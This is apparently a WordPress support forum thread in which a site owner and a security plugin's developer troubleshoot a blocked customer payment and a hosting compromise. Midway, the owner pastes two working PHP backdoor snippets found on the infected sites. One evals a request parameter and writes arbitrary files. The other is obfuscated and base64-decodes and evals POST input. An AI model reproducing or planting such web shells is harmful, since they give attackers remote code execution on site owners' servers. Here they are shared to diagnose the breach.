I forgot to mention I’m using the 3 Prevent zero-day exploit options available. Thank you.
Fist of all, I have to catch your situation.
1) You have an affiliate.
2) One of your customer wanted to buy something on your site.
3) When he/she enter the card number, he/she got an error.
4) So he/she sent you a message by email or something.
And about the environment of your site.
A) Your affiliate site is membership site.
B) So your customer should login as a registered user.
C) You enables “Prevent zero-day exploit” on “Admin ajax/post“.
If so, this plugin can potentially block the customer’s request. I presume that the customer got some JavaScript error on his/her terminal/device (for example smart phone or something) and cound not send the right authenticated information to your site after he/she entered the card number.
I recomend onece you set the all “Prevent zero-day exploit” to “Block by country“. This doesn’t need the authenticated information no more.
And also I expect you to enable “Record validation logs“. I’d like to see the log of the customer’s request and the user agent.
Thanks.
Hi Gascone,
Could you also let me know about the plugins your are using in your affiliate sites because I don’t know much about affiliate and I should know the requirements this plugin should provide you.
I will appreciate you if you post the list of your plugins.
Thanks a lot.
Hello tokkonopapa. Thank you for your prompt response. Really appreciate it!
My site is an affiliate site. Not a membership site. The customer is not a registered user. He was trying to access the program I promote which is a membership site. The customer got some error message and couldn’t send the purchase info (name, e-mail, etc) to the vendor’s site after he entered the card number.
On the other hand, four days ago I installed IP GEO BLOCK plugin (Prevent zero-day exploit) on several of my sites. Yesterday afternoon I got an email from my server, Bluehost, telling me that I got tons of malware installed on six of my sites…
“These are malicious scripts that allow for the remote execution of malware and spam. Generally this file is POSTed to, which then causes another file to be written and executed. With the process, the file is then deleted to obfuscate what it’s doing. While this allows for the arbitrary execution of about anything, it’s generally spam related actions being taken. The presence of these files indicates that your hosting account has definitely been compromised, usually through out-of-date WordPress or Joomla installations. This can be either through outdated core code or outdated/vulnerable themes, templates, plugins, components, frameworks, etc.”
I would like to send you the e-mail (list of compromised files) Maybe you can figure out why the plugin didn’t block this malware installations. Thanks.
By the way, I always keep my sites up to date (plugins, themes, WP version) and keep no backups or old versions of my sites on my server. Thanks.
I understand your situation and sorry about that. Have you already revived your sites? For your customers, it is necessary to return your sites to normal state ASAP. Then we would think about this plugin works correctly. If this plugin blocks your custormer’s request but could not block the malicious access, it’s not my expectation.
Yes, your information received from your hosting service provider can help me to figure out the reason. And also some access logs in your server and validation logs in this plugin are also helpful very much.
I think it may take considerable period of time. But I’d like to dedicate to find out the reason and the solution. So please send me any information you can get. And keep watching this thread.
Thanks and good luck!
Thank you for asking. Since there were so many websites compromised Bluehost cleaned the particular files. Now, I have to find and fix the vulnerability that allowed my account to be compromised.
The malicious code detected is similar to:
Files containing content similar to the following:
$twqwpz = "728bb9141a4c20b69bddc0b9f13321ce"; if(isset($_REQUEST['byowg'])) { $addazjs = $_REQUEST['byowg']; eval($addazjs); exit(); } if(isset($_REQUEST['wilx'])) { $pklai = $_REQUEST['dsjblrdj']; $zpxzt = $_REQUEST['wilx']; $asjs = fopen($zpxzt, 'w'); $fbedhto = fwrite($asjs, $pklai); fclose($asjs); echo $fbedhto; exit(); }
?>
OR
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n272748'];if(isset($s22)){eval($s21($s22));}?>
Do you want me to send you yesterday’s validation logs or which dates (?) Thank you
Hi Gascone,
I’d like to give you some important notices about this tipic. Please contact me at tokkonopapa @ yahoo.com by email (delete spaces arround @).
Dear moderators.
I’ll ask you to delete the privious list of files for security reason.
I appreciate your help.
Thanks.
May be I subscribed without modlook tag.
Thanks.
@tokkonopapa. You did subscribe to the the modlook your last post and it was determined that there is no “security reason” to remove any of the file paths.
Hello Justin Greer. What if I ask to please remove the file paths? Thanks.
Justin, I knew it was not a very good idea when I posted the file paths. I thought the post could be removed upon request though. That’s what I’m requesting right now. Thank you.
I am going to remove the paths but do note the forum guideline below. It is debatable that file paths are a security risk so in he absence of certainty….
When a post is made and people contribute answers to an issue, that then becomes part of the community resource for others to benefit from. Deleting posts removes this added value. Forum topics will only be edited or deleted if they represent a valid legal, security, or safety concern.
Hi Justin,
Thank you for your investigation of this topic. And I also appreciate your moderation. I hope my guess or anxiety is misdirected.
@gascone, Would you send me an email? Let me explain my thinking. May be I can help you to improve your site management. Of course it’s your choice. But I think I can’t identify your two questions about this plugin in this current situation event if you already cleaned up the infected files.
1. This plugin potentially blocks your customer’s request.
2. This plugin can’t block malicous access which infects your site with back door.
Thanks.
Hi Justin. Really appreciate you honored my request. My concern was giving away my sites’ vulnerabilities and leaving them exposed to more of the same. The fact that malicious code was installed on some of my sites is still there anyway. Thank you 🙂
@tokkonopapa, Thank you very much for offering your help. I wish more software developers were as concerned for their product users as you are! I sent you an e-mail @ 10:56 am (I’ll resend it). I have good news for you and for the forum… I’ve making sales on some of my other sites. I didn’t deactivate the plugin on those sites. I know now that probably I had WordFence Lockdown mode on that particular site since it was recently targeted and under brute force attack for 3 days. I couldn’t tell for sure because the WordFence settings only showed me “custom settings”, but I’m pretty sure that was the reason why my customer’s payment was blocked.
